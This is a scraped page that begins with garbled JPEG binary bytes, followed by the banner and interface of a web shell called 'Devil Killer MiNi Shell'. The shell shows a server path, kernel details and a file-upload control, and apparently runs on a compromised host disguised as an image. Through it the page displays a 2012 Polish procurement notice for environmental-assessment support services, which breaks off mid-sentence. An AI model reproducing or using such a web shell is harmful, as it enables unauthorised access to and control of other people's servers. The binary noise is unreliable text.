JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120113/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120113/11888-N-2012.html

<p class="kh_header"><b>Warszawa: Świadczenie usług wsparcia w ramach projektu Przygotowanie instrumentów wsparcia dla systemu ocen oddziaływania na środowisko</b><br>
<b>Numer ogłoszenia: 11888 - 2012; data zamieszczenia: 13.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Generalna Dyrekcja Ochrony Środowiska , ul. Wawelska 52/54, 00-922 Warszawa, woj. mazowieckie, tel. 22 57 922 89, faks 22 57 925 55.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.gdos.gov.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa centralna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług wsparcia w ramach projektu Przygotowanie instrumentów wsparcia dla systemu ocen oddziaływania na środowisko.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług wsparcia w ramach projektu Przygotowanie instrumentów wsparcia dla systemu ocen oddziaływania na środowisko, realizowanego w ramach programu priorytetowego Wsparcie realizacji Polityki Ekologicznej Państwa przez Ministra Środowiska Część 4) Wspieranie systemu ocen oddziaływania na środowisko i obszarów Natura 2000 z podziałem na pięć części (zadań):
Część (Zadanie) I - Świadczenie usług administracyjno-biurowych
Część (Zadanie) II - Świadczenie usług wsparcia w zakresie przygotowania opracowań,
Część (Zadanie) III - Obsługa finansowo - księgowa projektu
Część (Zadanie)  IV - Świadczenie usług wsparcia merytorycznego i technicznego prac związanych z budową i wdrożeniem systemu informatycznego wspomagającego proces ocen oddziaływania na środowisko
Część (Zadanie)  V - Świadczenie usług eksperckich w zakresie strategicznej oceny oddziaływania na środowisko oraz ocen oddziaływania na środowisko w kontekście transgranicznym.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, na podstawie art. 67 ust. 1 pkt 6 PZP, polegających na udzieleniu w okresie 3 lat od udzielenia zamówienia podstawowego dotychczasowemu wykonawcy usług, zamówień uzupełniających, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 71.31.30.00-5, 72.22.41.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 27.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełniających warunek udziału w postępowaniu, zostaną uznani Wykonawcy, którzy dysponują osobami zdolnymi do wykonania zamówienia, tzn. do realizacji zamówienia wyznaczą jedną osobę posiadającą: 1) dla Części (Zadania) I: - wykształcenie wyższe lub w trakcie studiów, - co najmniej 6-miesięczne doświadczenie zawodowe w wykonywaniu prac administracyjno-biurowych, - umiejętność obsługi urządzeń biurowych (fax, skaner, kserokopiarka), -	umiejętność posługiwania się programami pakietu MS Office (poziom zaawansowany) - Excel, Word, Power Point, - umiejętność redagowania pism, - znajomość zasad obiegu, ewidencjonowania i archiwizacji dokumentów, - mobilność i dyspozycyjność w zakresie wykonywania zadań (czynności będące przedmiotem Umowy Wykonawca wykonywać będzie w siedzibie Zamawiającego w godzinach pracy obowiązujących u Zamawiającego, a w razie potrzeby także poza tymi godzinami lub/i poza siedzibą Zamawiającego). 2) dla Części (Zadania) II: - wykształcenie wyższe, - co najmniej 6-miesięczne doświadczenie zawodowe w wykonywaniu prac na rzecz projektu realizowanego przez organ administracji publicznej, finansowanego ze środków zewnętrznych, - umiejętność posługiwania się programami pakietu MS Office (poziom zaawansowany) - Excel, Word, Power Point, - znajomość ustawy z dnia 7 listopada 1996 r. o obowiązkowych egzemplarzach bibliotecznych (Dz. U. Nr 152, poz. 722 z późn. zm.) i rozporządzenia Ministra Kultury i Sztuki z dnia 6 marca 1997 r. w sprawie wykazu bibliotek uprawnionych do otrzymywania egzemplarzy obowiązkowych poszczególnych rodzajów publikacji oraz zasad i trybu ich przekazywania (Dz. U. 1997, nr 29, poz. 161 z późn. zm.), - znajomość ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.) wraz z aktami wykonawczymi, - umiejętność wykonywania korekty drukarskiej zgodnie z normą PN-72/P-55036, - znajomość zasad zarządzania procesem wydawniczym, - mobilność i dyspozycyjność w zakresie wykonywania zadań (czynności będące przedmiotem Umowy Wykonawca wykonywać będzie w siedzibie Zamawiającego w godzinach pracy obowiązujących u Zamawiającego, a w razie potrzeby także poza tymi godzinami lub/i poza siedzibą Zamawiającego), 3) dla Części (Zadania) III: - wykształcenie wyższe lub w trakcie studiów, - umiejętność posługiwania się programami pakietu MS Office - Excel, Word, - mobilność i dyspozycyjność w zakresie wykonywania zadań (czynności będące przedmiotem Umowy Wykonawca wykonywać będzie w siedzibie Zamawiającego w godzinach pracy obowiązujących u Zamawiającego, a w razie potrzeby także poza tymi godzinami lub/i poza siedzibą Zamawiającego), 4) dla Części (Zadania) IV: wykształcenie wyższe, doświadczenie eksperckie w zakresie architektury systemów informatycznych, tzn. architektury biznesowej, architektury danych, architektury komunikacji, aplikacji architektury technicznej, w tym udział w co najmniej 2 projektach po stronie Zamawiającego, których przedmiotem było wytworzenie systemu informatycznego o zasięgu ogólnopolskim, w tym minimum jednego na potrzeby administracji publicznej, - doświadczenie ekspercie w zakresie infrastruktury technicznej tzn. analizy wymagań sprzętowych, oprogramowania systemowego i aplikacyjnego oraz określenia standardów infrastruktury teleinformatycznej systemu oraz jego budowie, wdrażaniu i utrzymaniu, zarządzaniu wymaganiami, w tym brała udział w co najmniej 2 projektach po stronie Zamawiającego, których przedmiotem było wytworzenie systemu informatycznego o zasięgu ogólnopolskim, w tym minimum jednego na potrzeby administracji publicznej, - umiejętność posługiwania się językiem angielskim w zakresie niezbędnym do czytania dokumentacji technicznej, - udokumentowaną znajomość zarządzania projektami, potwierdzoną certyfikatem, - udokumentowaną znajomość zagadnień ITIL (ang. Information Technology Infrastructure Library) i zarządzanie usługami IT, - udokumentowaną znajomość administracji i zarządzania infrastrukturą wirtualną vmware, - udokumentowaną znajomość zagadnień organizacji procesu analizy oraz zarządzania wymaganiami, - wiedzę w zakresie wymagań nałożonych ustawą z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. Nr 64, poz. 565, z późn. zm.) wraz z aktami wykonawczymi, - znajomość ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2002 r. Nr 101, poz. 926 z późn. zm.) wraz z aktami wykonawczymi, - znajomość ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.) wraz z aktami wykonawczymi. 5) dla Części (Zadania V): - wykształcenie wyższe z zakresu ochrony środowiska lub nauk o ziemi, - co najmniej siedmioletnie doświadczenie w zakresie strategicznych ocen oddziaływania na środowisko i ocen oddziaływania na środowisko dla przedsięwzięć, w szczególności w kontekście transgranicznym, - znajomość ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. Nr 199, poz. 1227 z późn. zm.), - znajomość rozporządzenia Rady Ministrów z dnia 9 listopada 2010 r. w sprawie przedsięwzięć mogących znacząco oddziaływać na środowisko (Dz. U. Nr 213, poz. 1397), - znajomość ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r., Nr 243, poz. 1623 z późn. zm.), - znajomość ustawy z dnia 14 czerwca 1960 r. Kodeks postępowania administracyjnego (Dz. U. z 2000 r. Nr 98, poz. 1071 z późn. zm.), - znajomość Dyrektywy Parlamentu Europejskiego i Rady 2001/42/WE z dnia 27 czerwca 2001 r. w sprawie oceny oddziaływania niektórych planów i programów na środowisko, - znajomość Dyrektywy Rady 85/337/EWG z dnia 27 czerwca 1985 r. w sprawie oceny skutków niektórych publicznych i prywatnych przedsięwzięć dla środowiska, - znajomość Dyrektywy 92/43/EWG w sprawie ochrony siedlisk przyrodniczych oraz dzikiej fauny i flory,  Dyrektywy 2009/147/WE z 30 listopada 2009 w sprawie ochrony dzikiego ptactwa, - znajomość Konwencji o ocenach oddziaływania na środowisko w kontekście transgranicznym, sporządzona w Espoo dnia 25 lutego 1991 r., - znajomość Protokołu w sprawie strategicznej oceny oddziaływania na środowisko w kontekście transgranicznym, sporządzonego dnia 21 maja 2003 r. w Kijowie do Konwencji z Espoo, - znajomość Konwencji o Dostępie do Informacji, Udziale Społeczeństwa w Podejmowaniu Decyzji oraz Dostępie do Sprawiedliwości w Sprawach Dotyczących Środowiska, podpisanej dnia 25 czerwca 1998 w Aarhus, - doświadczenie w prowadzeniu negocjacji dotyczących umów międzypaństwowych w zakresie ochrony środowiska, - co najmniej pięcioletnie doświadczenie w pracy w administracji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza zmianę postanowień zawartej umowy w zakresie zamiany osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej umowy, sprostowania oczywistych omyłek pisarskich i rachunkowych, innych zmian, których nie można przewidzieć w chwili zawierania umowy pod warunkiem, że zmiany te będą korzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://bip.gdos.gov.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Generalna Dyrekcja Ochrony Środowiska, sekretariat Departamentu Ocen Oddziaływania na Środowisko, (V p. pok. 531), ul. Wawelska 52/54 00-922 Warszawa.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 23.01.2012 godzina 09:00, miejsce: Generalna Dyrekcja Ochrony Środowiska, sekretariat Departamentu Ocen Oddziaływania na Środowisko, (V p. pok. 531), ul. Wawelska 52/54 00-922 Warszawa.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie I - Świadczenie usług administracyjno-biurowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usług administracyjno-biurowych, polegających na: - kompletowaniu i archiwizowaniu dokumentacji projektowej, - prowadzeniu działań administracyjnych i organizacyjnych wspierających zespół projektowy, w tym m.in. przygotowywaniu materiałów niezbędnych do sporządzania notatek i protokołów ze spotkań, narad roboczych i koordynacyjnych w ramach projektu, dystrybucji i prowadzeniu rejestru publikacji, -	pomocy technicznej w prowadzeniu procedur zamówień publicznych związanych z realizacją zadań w ramach projektu (kopiowanie, skanowanie, archiwizowanie na elektronicznych nośnikach danych, przygotowywanie korespondencji do wysłania, itp.), - współpracy przy organizacji spotkań, narad i szkoleń, organizowanych w ramach projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 71.31.30.00-5, 72.22.41.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie II - Świadczenie usług wsparcia w zakresie przygotowania opracowań.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usług wsparcia w zakresie przygotowania opracowań, obejmujące: a)	obsługę techniczną procesu wydawniczego, w tym: - koordynację i monitoring zleceń poligraficznych - bezpośrednią współpracę z drukarniami i autorami opracowań, - weryfikację składu publikacji i nanoszenie korekty wydawniczej zgodnie z normą PN-72/P-55036, -	obsługę procesu nadawania numerów ISBN publikacjom wydawanym w ramach projektu, - współpracę z bibliotekami w zakresie przesyłania obowiązkowych egzemplarzy bibliotecznych zgodnie z ustawą z dnia 7 listopada 1996 r. o obowiązkowych egzemplarzach bibliotecznych (Dz. U. Nr 152, poz. 722 z późn. zm.) i rozporządzeniem Ministra Kultury i Sztuki z dnia 6 marca 1997 r. w sprawie wykazu bibliotek uprawnionych do otrzymywania egzemplarzy obowiązkowych poszczególnych rodzajów publikacji oraz zasad ich przekazywania (Dz. U. Nr 29, poz. 161, z późn. zm.), b)	współpracę przy realizacji wniosków regionalnych dyrektorów ochrony środowiska o dofinansowanie wykonania opracowań, w tym: - przygotowywanie projektów decyzji o dofinansowaniu wykonania opracowań, - przygotowywanie projektów umów trójstronnych, - monitorowanie terminowej realizacji umów trójstronnych, - prowadzenie rejestru złożonych wniosków i zawartych umów trójstronnych, c) współpracę przy wyborze wykonawców (autorów) opracowań, zgodnie z ustawą z dnia 29 stycznia 2004 r. Prawo zamówień publicznych (t.j. Dz. U. z 2010 r. Nr 113, poz. 759 z późn. zm.) oraz wewnętrznym regulaminem udzielania zamówień publicznych, obowiązującym u Zamawiającego, w tym:  - dokumentowanie rozpoznania rynku potencjalnych wykonawców, - przygotowywanie projektów wniosków w sprawie realizacji zamówień publicznych,
- przygotowywanie projektów umów z autorami opracowań; d) współpracę przy monitorowaniu realizacji umów z autorami opracowań, w tym: - bieżące kontakty robocze z wykonawcami, - monitorowanie terminowej realizacji umów..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 71.31.30.00-5, 72.22.41.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie III - Obsługa finansowo - księgowa projektu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Obsługa finansowo - księgowa wydatków budżetowych Generalnej Dyrekcji Ochrony Środowiska, jako dysponenta III stopnia, w ramach projektu, w tym regulowanie zobowiązań bezgotówkowych celem prawidłowego realizowania wydatków budżetowych, zgodnie z obowiązującym planem rzeczowo - finansowym Generalnej Dyrekcji Ochrony Środowiska, obejmujące: a) przyjmowanie, sprawdzenie i opisanie dowodów księgowych pod względem formalno - rachunkowym oraz ich dekretowanie, b) kontrolę poprawności danych rachunkowych i opisów dowodów pod względem merytorycznym oraz zgodności z zawartymi umowami, c) wystawianie not księgowych i not korygujących, d) wprowadzenie dokumentów księgowych do modułu Finansowo -Księgowego, e) rozliczanie delegacji krajowych, f) współpracę z komórkami organizacyjnymi GDOŚ w zakresie prowadzonych zagadnień, g) rozliczanie umów cywilnoprawnych, h) przygotowanie dokumentacji rozliczeniowej dotyczącej okresowych i końcowych dofinansowań oraz sprawozdań z realizacji projektu, i) bieżący monitoring wykorzystania środków w ramach projektu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 75.11.21.00-5, 71.31.30.00-5, 72.22.41.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 27.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie IV - Świadczenie usług wsparcia merytorycznego i technicznego prac związanych z budową i wdrożeniem systemu informatycznego wspomagającego proces ocen oddziaływania na środowisko.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Świadczenie usług wsparcia merytorycznego i technicznego prac związanych z budową i wdrożeniem systemu informatycznego wspomagającego proces ocen oddziaływania na środowisko, w tym: a) świadczenie usług wsparcia dotyczące przygotowania, wdrożenia i utrzymania systemu w zakresie jego instalacji i konfiguracji, b) przygotowywanie dokumentacji technicznej na potrzeby prowadzonych postępowań o udzielenie zamówienia publicznego, w tym szczegółowego opisu przedmiotu zamówienia oraz propozycji warunków udziału w postępowaniu, stawianych potencjalnym Wykonawcom, c) udział w pracach komisji przetargowej w charakterze eksperta, w tym: -	przygotowywanie projektów ewentualnych wyjaśnień dotyczących treści Specyfikacji Istotnych Warunków Zamówienia (Szczegółowego Opisu Przedmiotu Zamówienia), - składanie wniosków do przewodniczącego komisji przetargowej o wprowadzenie zmian do Specyfikacji Istotnych Warunków Zamówienia (Szczegółowego Opisu Przedmiotu Zamówienia) - na etapie przygotowywania ww. projektów, - udział w badaniu złożonych ofert, w szczególności ich opiniowanie w zakresie zgodności oferty ze Szczegółowym Opisem Przedmiotu Zamówienia, - wydanie końcowej opinii dotyczącej wyboru najkorzystniejszej oferty (wraz z uzasadnieniem) po dokonaniu przez Zamawiającego oceny ofert niepodlegających odrzuceniu na podstawie przyjętych kryteriów, - w przypadku wniesienia odwołania, przedstawienie propozycji odpowiedzi na odwołanie (jeżeli dotyczy zgodności wybranej oferty ze Szczegółowym Opisem Przedmiotu Zamówienia); d)	usługi kontroli nad realizacją przez zewnętrznych Wykonawców poszczególnych komponentów systemu, w tym: - przedstawianie opinii dotyczących propozycji 